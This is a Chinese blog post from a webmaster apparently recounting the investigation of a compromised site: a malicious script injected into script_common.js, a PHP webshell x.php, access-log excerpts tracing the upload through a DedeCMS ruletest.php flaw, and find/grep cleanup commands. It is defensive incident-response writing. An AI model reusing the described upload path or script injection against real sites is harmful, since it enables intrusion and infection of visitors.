C1G军火库

关注互联网、网页设计、Web开发、服务器运维优化、项目管理、网站运营、网站安全…

Categories:

网站被挂马

访问时uchome.c1gstudio.com卡巴斯基报木马,nod32和诺顿无反应。

寻找挂马方式 ie8+开发和用http_watch发现有挂马请求,ie6,ie7+flidder2,firefox 2和3+firebug无法发现请求. 请求地址为(实际地址已隐去，只作示例)

http://xxx.xxxw3.com/a.js

查看首页原码无此请求，但用dom查看器可以发现。制作一临时html文件，copy首页源代码放入，通过增删代码找到木马放在/source/script_common.js中 ftp到server查看该文件已被修改并在首行有以下请求代码。

document.writeln(“

在uchome.c1gstudio.com/下还有一x.php 十分可疑下载下来是加密过的,破解后为”黑狼PHP木马”. 文件上传日期为2009/04/20.

搜索文件其它域名根目录下也有此文件，立即将其改名禁止攻击者访问。

find /opt/htdocs -name ‘x.php’ -print

攻击者怎么把木马放上来的呢？ 搜索近期的web访问日志，看看攻击者都做了什么操作。

cat /opt/nging/logs/uchome.c1gstudio.com.log |grep /x.php

得到攻击者ip后，再查ip

cat /opt/nging/logs/uchome.c1gstudio.com.log |grep 125.70.209.110 125.70.209.110 – – [20/Apr/2009:10:12:16 +0800] “GET / HTTP/1.1” 200 5129 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [20/Apr/2009:10:12:17 +0800] “GET / HTTP/1.1” 200 5130 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [20/Apr/2009:10:12:22 +0800] “-” 400 0 “-” “-” – 125.70.209.110 – – [20/Apr/2009:10:12:35 +0800] “GET //x.php HTTP/1.1” 200 444 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [20/Apr/2009:10:12:35 +0800] “GET /favicon.ico HTTP/1.1” 200 3638 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” –

木马已上传，再换个日期查

cat /opt/nging/logs/uchome.c1gstudio.com.20090419.log |grep 125.70.209.110 125.70.209.110 – – [19/Apr/2009:19:25:01 +0800] “GET /../admin/index.asp HTTP/1.1” 400 170 “-” “-” – 125.70.209.110 – – [19/Apr/2009:19:25:09 +0800] “GET /../admin/default.asp HTTP/1.1” 400 170 “-” “-” – 125.70.209.110 – – [19/Apr/2009:19:25:12 +0800] “GET /../admin/manage.asp HTTP/1.1” 400 170 “-” “-” – 125.70.209.110 – – [19/Apr/2009:19:40:01 +0800] “GET / HTTP/1.1” 200 5234 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:40:48 +0800] “GET /do.php?ac=sendmail&rand=1240141201 HTTP/1.1” 200 35 “http://uchome.c1gstudio.com/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:40:48 +0800] “GET /favicon.ico HTTP/1.1” 200 3638 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:42:35 +0800] “GET /includes/class.Member.php HTTP/1.1” 404 526 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:42:36 +0800] “GET /favicon.ico HTTP/1.1” 304 0 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:42:45 +0800] “GET /includes/ HTTP/1.1” 404 526 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:42:46 +0800] “GET /favicon.ico HTTP/1.1” 304 0 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:43:19 +0800] “GET / HTTP/1.1” 200 5236 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:43:27 +0800] “GET /do.php?ac=sendmail&rand=1240141399 HTTP/1.1” 200 35 “http://uchome.c1gstudio.com/” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:43:28 +0800] “GET /favicon.ico HTTP/1.1” 200 3638 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:44:17 +0800] “GET /x.php HTTP/1.1” 404 526 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:44:17 +0800] “GET /favicon.ico HTTP/1.1” 304 0 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” –

攻击者在扫描网站，但还未上传x.php，应该不是在这个域名下上传的。换个域名

125.70.209.110 – – [19/Apr/2009:19:25:36 +0800] “GET /DB%23steer/DBBACK/[email protected] HTTP/1.1” 404 3864 “-” “Mozilla/4.0” – 125.70.209.110 – – [19/Apr/2009:19:25:38 +0800] “GET //guanli/ HTTP/1.1” 302 5 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:25:38 +0800] “GET //guanli/login.php?gotopage=%2F%2Fguanli%2F HTTP/1.1” 200 984 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:25:42 +0800] “GET //include/vdimgck.php HTTP/1.1” 200 1304 “http://file.c1gstudio.com//guanli/login.php?gotopage=%2F%2Fguanli%2F” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:25:44 +0800] “GET /favicon.ico HTTP/1.1” 404 1803 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:25:51 +0800] “GET //guanli/ruletest.php HTTP/1.1” 200 1152 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:25:52 +0800] “GET /favicon.ico HTTP/1.1” 404 1803 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:25:59 +0800] “POST //guanli/ruletest.php HTTP/1.1” 200 48 “http://file.c1gstudio.com//guanli/ruletest.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:02 +0800] “GET //guanli/yhs.php HTTP/1.1” 200 35 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:03 +0800] “GET /favicon.ico HTTP/1.1” 404 1803 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:11 +0800] “GET /guanli/yhs.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 HTTP/1.1” 200 2536 “http://file.c1gstudio.com//guanli/yhs.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:11 +0800] “GET /guanli/yhs.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 HTTP/1.1” 200 2158 “http://file.c1gstudio.com//guanli/yhs.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:11 +0800] “POST //guanli/yhs.php HTTP/1.1” 200 8617 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:13 +0800] “POST //guanli/yhs.php HTTP/1.1” 200 77 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:40 +0800] “POST //guanli/yhs.php HTTP/1.1” 200 53 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:47 +0800] “GET //guanli/x.php HTTP/1.1” 200 444 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:48 +0800] “GET /favicon.ico HTTP/1.1” 404 1803 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:51 +0800] “POST //guanli/x.php HTTP/1.1” 200 159 “http://file.c1gstudio.com//guanli/x.php” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” – 125.70.209.110 – – [19/Apr/2009:19:26:54 +0800] “GET /guanli/x.php HTTP/1.1” 200 444 “-” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; TencentTraveler ; .NET CLR 2.0.50727)” –

攻击方法 攻击者通过//guanli/ruletest.php 上传yhs.php 并上传x.php木马通过x.php对文件植入代码

系统漏洞 ruletest.php 为dede cms的安全漏洞

查找感杂文件 查找web文件夹中是否有挂马 find /opt/htdocs -name “.js” -exec grep -I -l “w3.com” {} \; find /opt/htdocs -name “.htm” -exec grep -I -l “w3.com” {} \; find /opt/htdocs -name “.html” -exec grep -I -l “w3.com” {} \; find /opt/htdocs -name “.php” -exec grep -I -l “w3.com” {} \;

查找web文件夹中是否还有后门 find /opt/htdocs -name “x.php” -print;

最近修改过的文件(后门可以自定文件修改时间，所以这个不可靠) find /opt/htdocs -mtime -1 -type f -exec ls -l {} \;

攻击者将多个挂马插入大部分html,js,php，404.htm等也有改名上传了多个木马在不同目录，并在原有程序上按插上传代码。

修复方法 由于感染太多就将原有web目录移除，并重新上传文件。删除dede的后台修改mysql,主机,web等管理密码。

Posted in 安全.

Tagged with 挂马, 木马.

rev="post-448" No comments

By C1G – 2009/04/23

No Responses (yet)

Stay in touch with the conversation, subscribe to the RSS feed for comments on this post.

« nginx rewrite 参数和例子如何使用shell命令统计某个目录下的文件数(目录中有下级目录) »

Proudly powered by WordPress and Carrington.

网站被挂马

No Responses (yet)

About C1G军火库

分类

归档

其他操作

近期文章

近期评论

AI

博客互联

安全

我的

技术论坛

收藏夹

架构研发

设计体验

网站被挂马

No Responses (yet)

Subscribe

About C1G军火库

分类

归档

其他操作

近期文章

近期评论

标签

AI

博客互联

安全

我的

技术论坛

收藏夹

架构研发

设计体验